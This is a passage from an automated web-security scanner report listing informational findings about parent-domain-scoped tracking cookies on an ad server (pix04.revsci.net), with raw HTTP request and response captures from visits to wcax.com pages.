Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:31:14 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
5.102. http://pix04.revsci.net/E05511/a4/0/0/pcx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /E05511/a4/0/0/pcx.js?csid=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc2dfb1&0&&4d9d35c9&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc2dfbd&0&&4d9d2f40&00f8712b16a2747053422af6cef97d9a; rtc_33wk=MLuBO6+ht4kWQAcYCwq3qvGtUKGrBZ8doDP9+JcCeOOzqVD+we0MdrEy1Q9wVOPnx3+D9JMtHr3sXfzNw3d1fHSsgQ0j1PMA3u0A65h1Zdx44dhHS5+AaIPoFOSkJCsUdawtp/+wPz4ovCW6/jlMSWl5gugGYoVzCFcXDgXPFV44jOFQ9OvWXmsv0TUYz+5nkUCtLLzUzXTh7M+zWyh9Os1EVo5VMh5rHTjjZnK71873pcHYYzezCHZTM/2+0SL4Kjk8dPShfwkCSnJWFkNsK0MzXgFnrllh6u548CifcAFwE1rm2D91a3IypBzg; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc2dfda&0&&4d9c03eb&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPNOUllLgIQVp2RxvqihGlAFSS4kHOeU66DJ0MOK5EzOCS2EByYfg7Qrqibp15G8KTrDuD6DAQkoQrdkdlzUiguejeRGfCSakzCoHZKm/jYrxQbkP1M3eZsdsuqc+uLh77lb/zkdFc3E54U2MEX2fHfbhfnLsMGeW5DWmK1KT64FYIE9CapbZj+AZ0UnNTmtUbpdxDL/rVbtchfPfF47acMHxbgs3BSVlWVsirz+chCnZgnJ1SCiD9YAA==; udm_0=MLv39SEJaSpn5l6paNmEREzM5uAjEsBEbZba7uQQIHoALYGisPLsFHhBzkvhsvoTAE9Wvh6ZCxNEguR8S2rPkq36I/Y42ALDUOFLsElUcIPk9fKtZgFPAifF96YUyd0oLw0n0Ryt05wdrN868QJ/+5QhhVDeoAuh30DL1Nhh9Cj6Z6bFYRSzXtL17j6Azv6OJ7vZk+tBc1rGGFfHZ8KvQqVAuPohuFqyL9DCTu4N0Gi+vRwD/rSPuL1I9buZQs2FTpssoPA2lbNTF5HywZMTMvEJzT0Zf2UCkxkv4eFl2m+vJ05v7cxXSZCytfEePc3AVcKePos/B6yGLnOnYNZSbct435ntIpmH+aMoQIO1EEBT/KbMs4hz185mDkHl9ZhQ39ljvZDokrGoTU36gJfTJZI/AqWc0s0Xmbv+pE9pw7ldj41i8wbXyTCypJvRY2Q6QpW/VxvJxSNMtuSsgJLL78oDV0r4PR7nI83zsUuOS3RTLGmoD3dqyR4OH4CVdFAjOC5c1c5gtOr1VVOjgkORQRxylxYzirxZwMyP6/DKD8ngoLSc1GRKtnJzMc/bI0l4AEBF/cQi4iDXo+iRxGlBQS15VZXhxq88Nq17eHWw9sEvQd1KJzj3TkOH5xiza3lfPjV8/CHorrK/+Knobbr3hxTR+CDzj6HH90GGT11M9it+1+QA5nWCEArmpXBdmF6CsdzcoC8OR+A2ZnIOw21PFvMOjPJ0Xl4ibJjWNuZLTuB1pifXet2MrhoPp1+fInzsdxtGeHmDvcCDU5EzIBOGhIw1ek72Dd+mmWJa7p78Egukc2SG4u/GfEFrBJvicafxIMcv0rhZ8jG4whpHITo1dongFFkobD4S8XLrx2FfETkMJiYku6qW2LdkVjWOWQhvIn8h6J78k9hHbKJ/8ZAg0J7tKUKeAUHjqFcYAEZH0H9DcwWmXwEcnQEbhb9TCWm/0ppaG1RDf1n+fu24/+jM7KvN/z7/7q0u56jH+YrYa3a+P1ge47W+os0pZiaDQpJH0htz1ZJ9klEG2dBtkl1cI3R0VAnabjV6XDJT9jTTZOg12FcQncz8373PU7Ej0JkBaKIJAHku50JX6LtJ/FgCiFkaBBhVLHZvlusvhSNrYDJHBvuC8L8qGa82X1lUTBV7rlrFEvpcBgBGilPpJasi; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOUnFLgIQV7mdYdLA2pc7YYCHwinKKAanZ4dp0pF1riTtzTEJ3YH2aKnvUGIZWEDBPcm1ODIeZsCvPIY7zEPvimq6xVR6C2raNjTLevnLzRGW6QFf6Yhb6PGsPk1+c9TuLw7uFuX0pTno91vWYq8r+jOHdTGOVVMxecxIAsgmxAWDiGibzfT77Zb9JXgwk7MvqhQNElIcyCgOANbrkFhxb4iOkSY8pHtiYCJ2dSkLqqKeeJ/f3w==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:29:28 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:29:28 GMT
Content-Length: 263

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['D08734_70006','D08734_72076','D08734_72077','D08734_72082'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['D08734_7
...[SNIP]...
5.103. http://pix04.revsci.net/E05511/b3/0/3/0902121/10608952.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/10608952.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/10608952.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%253FL%253D408799%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DL%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252F%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=408799
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc2dfb1&0&&4d9d35c9&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc2dfbd&0&&4d9d2f40&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc2dfda&0&&4d9c03eb&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; rtc_ZRdI=MLsvrFUucT5jJQFEjn4UCLtfKi1bT6XJF/Ke3QlsQpoZ1X9kRiPoMT0vPHni220BuefN4+w0QDxcRXN24I0Asr7xgdACqrHB0m67F9qXTgct2EN+vx1Kz2qgrSXHJMcW31u9PbAu1Q0puOakzdXHZVUaqKXKpvaRcVcKiXSTA7DL6lqA31DNueTJfahrhz8tvgH9JKtB0RUqAk7TLicfK1WfGaaOsREpwP9lBTpjNapbBi9c69Suxn4OypmFarcp5fNRqAbKRPRF8eHRNT4vvWr+PoZv2GyTjicCIP3umhIkB+xOAXxZrvclHRkbDsIsnwSNEAybZ0fF2IDRSpjtr3pDJ+ihxQDXHAbdwm6LbyN6IoNJ003+6/nA; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; rsi_segs_1000000=pUPNOU2FrwIQ1q3R0PbJo8GaVponY2jtSJcNJwOPRQb1v4U4HgcqewiMoo8UZf82yDpuxbUFPQiyIAbv/dFNHsZJ0JP83QhSdoQBExyJGwrIdoKnVwTHsilYaBBTtO3c/Y9R88f3EN1PkabXePPxNQuUgKNeALAAz0Dx0lLVJ9YS6Nq3NRopjwHgVY3uEFPbdsHx/ETyqXklDauCSWCUPlZ2E3h7UohRS3uUCODriDkzGVsL7KRXKu7Uo0D45uJbM1i9ig==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_ZRdI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOEOBLwIMVp8ceRM3WRl5l/8VdUUz9mYkDWlJfp5AoQ4NFluEUw2hr80cgj7G6Lq6eb2pifkgIl3hQFaWH4wAGfONd0AxNl9R4r24yg2IkXClwXqAex+KgbymzZmFm7jteB85NWCbzH30/LfD/5dGBfMl/lQilsQgCYbOhR/TOqs1CzTmsIjI86HM9xfM2aMyymX5pEXSTu39ZIZCVFV6SdsG3phwXxMrf4/AnE8sw4Fwp8TutlpkEIlytnRwbZJUkhE3TEfYC+97lBFbHn0=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:34:01 GMT; Path=/
Set-Cookie: rtc_Xb0-=MLsv7tUvsW9npigQh+m6PS9pIDm9YCrv+PJNecGjhxSUI1bCZ8Ri9PlaJ0eYwhF0dD57GtlzTWSLIXg3Y98VhJqU2IQZmMvmGuG9Jx5GJCMAKT9/9DCsOSrrzmmNaIkcQa83G6V7noY9MwAXfdgQgHVd/8ZT6oL5hwebdaMLK/91t2b/aRBabBZSk3tfHbOX1PK+XO36gnb2K3GZDddDK0R7j3WozV2g0OuzMO7KRVs5DYCIxULFxn28fZG0HT8WlUPkgbCcFK+aNbesM2ofG2rjFFYrX15lLAWfw+XPAPKPbZ3vEr5hBiSTVq2UpdmEVM0jExfX+kj25CPQeNDSfQt7H06cIGryO9V8q9VcDuXXy3+aY5RHWklTcyvTVQz9kggexx1fvkeTIHKTZhc4z7U=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:34:01 GMT; Path=/
Set-Cookie: NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Sat, 07-May-2011 12:34:01 GMT; Path=/
X-Proc-ms: 23
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:34:00 GMT
Content-Length: 323

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10004','D08734_70006','D08734_72076','D08734_72077','D08734_72082','E05511_50085'];
if(typeof(DM_onSegsAvailable)=="function")
...[SNIP]...
5.104. http://pix04.revsci.net/E05511/b3/0/3/0902121/135299998.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/135299998.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/135299998.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%2526affname%253DWCAX%2526adtag%253DPolitical%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18197%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDO6ET85se19nKCDeVRxV0pPvV/yUINBw3cQgYrocUZKyvzimWlj6utDM74WWx+zsRJJJHGffRnwGsNwXYNjevvtmFNS7oQ5OZmu22s+sITDi+rxYBR66D93WQXHgEf1oWZ1SDZ6kTZ3GQaGGwkpV/CuUsd6gGix0UAfqMlQMdGF8nTLK8Ncf8eOf1nn2QS6mQQLdlm9O2IxMsB5E2JAIeUSFVgimJPlVDu0b2JW9OM67FdTf5D5TesErOTr+cGfqpgbqb+TDPH82p030TSKqCMc3fiTs=; rtc_kyUL=MLsv8VUucT5jZiikOEcU9ETXogUC0zg5ozNC5TZsQpoZ1XM0c3poC/S8o6gL3dmLNudZyUEHBSAy9DbqYRishsAluZLfFyPHoW8OnSeutlPGT/9/yatZEYhKP0fsjK91LGefXs0IFtIUglN4VvEbdB94gnJik9VR3JwBRtB0k+C4P5UtnEKeKpV1g0Rv83740nXMV7YE/uPDtQFbm0Q8eV1Zd0GXuQK0nT7WirXZJe/V8mV9ZUoEyHl5odcfSkb+K6JNo78s6B8lVwS+1OK8yjE3ld42puQDa4oRtNPsj+tg+8uNeC31TvLQNYMxtN08pZU9Wwz7+Y02P0GKlzuW58YZ2ax+coZLrUgBLDwxwmi/FcTAEueywLNduv7UFNzWsaqmVoy0obcSI0s1HsFhhRgiluSuLojCnYPs3wnFuu3sguAbpZ24bo2l84IPd51AxF5VgN5/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_kyUL=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637EICbRNpW80lkUA+HR+nmR+zdL28cRLrw7OdqtvRQX7M6YvuD6G01f/BuKwL9GIcLk0FNznVXs1FOCnfg0VUZcvsQPTvmT/tqUJ5VUxzqzSb3Ao/eR1mU8id0bEE9wVyvXGviU4q2/8L7DKCUk26DEzJUarfj63iV8FJAzyuE5Zi5pVRUzke4isIv2Xs62p6o7L3i1SSGQfWcZZhRmSobq5ogFEHk0Q9IuNFPfqunL81NYW0J0cMF4iQTe6bDEQVWVkD//iJ0Os4aXvfsKebL8t1DQ7WD9p2JVOIsmRryZFO9xw==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:36:04 GMT; Path=/
Set-Cookie: rtc_jIvV=MLsv7iUucA5nphC0fK8UWVoPI7fHKbGZaCQWuLR8p51z2DQ30G6uId0c9nDR2NMmzuXDJn0g0ESydFY6J95tmRiMY4yJ+sPdsYG8naLdrtr9SkW1eU9LpSjwtwgkQP0c7xx5jIRX7BMLqY4BgQCi3lhOAqvHai05Eb4PMDzu8yVD7ZZtiMBMCGycqLqWQYCGq6/md6/qYfaCA/ASs+y+9h5Xku/5nx7gfwirUhl4NHT2YUt+eLF1KH0Dtob5tEs06Q4obofo5w6/Tq+72ff/TaSCEZMZN8I5s1OOFuAASezBAhhSmCgFlyoZVVoDwXYDXkzHvff3+yl07BzRzA1eRi19Z+xwYoBSMP57irOrEQXluDeg+WH4CuHVXdpJP4HgrkGvCJrCPigIHu5GI7hwiNibi41/41/tnH36B3S/V+jJFysVDPJjnlu9tMtcj3eUM1FGM6b+OUkIZ7c78jeLogk07LTWGnScH2nMsO4=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:36:04 GMT; Path=/
X-Proc-ms: 53
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:36:04 GMT
Content-Length: 623

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424','D08734_72076'
...[SNIP]...
5.105. http://pix04.revsci.net/E05511/b3/0/3/0902121/209148801.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/209148801.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/209148801.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252F%253Faffname%253DWCAX%2526adtag%253DHomepage%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; 